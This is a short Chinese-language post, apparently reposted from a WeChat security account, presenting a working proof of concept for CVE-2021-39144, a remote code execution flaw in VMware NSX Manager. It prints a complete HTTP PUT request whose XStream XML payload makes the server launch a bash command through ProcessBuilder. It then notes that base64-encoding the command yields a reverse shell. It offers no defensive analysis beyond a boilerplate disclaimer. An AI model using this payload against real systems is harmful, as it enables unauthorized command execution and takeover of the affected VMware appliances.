免责声明
简介
访问VMware Appliance Management页面,如图:
使用下面Poc进行命令执行测试:
PUT /api/2.0/services/usermgmt/password/abc HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Connection: close
Content-Type: application/xml
Content-Length: 546
<sorted-set>
<string>foo</string>
<dynamic-proxy>
<interface>java.lang.Comparable</interface>
<handler class="java.beans.EventHandler">
<target class="java.lang.ProcessBuilder">
<command>
<string>bash</string>
<string>-c</string>
<string>cmd</string>
</command>
</target>
<action>start</action>
</handler>
</dynamic-proxy>
</sorted-set>
GetShell
直接bash会因为特殊字符无法获得shell。通过base64编码一下即可反弹shell,如图:
Xray Poc
https://t.zsxq.com/08OAm0JQ9
原文始发于微信公众号(Hack All):VMware NSX Manager XStream 远程代码执行漏洞(CVE-2021-39144)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论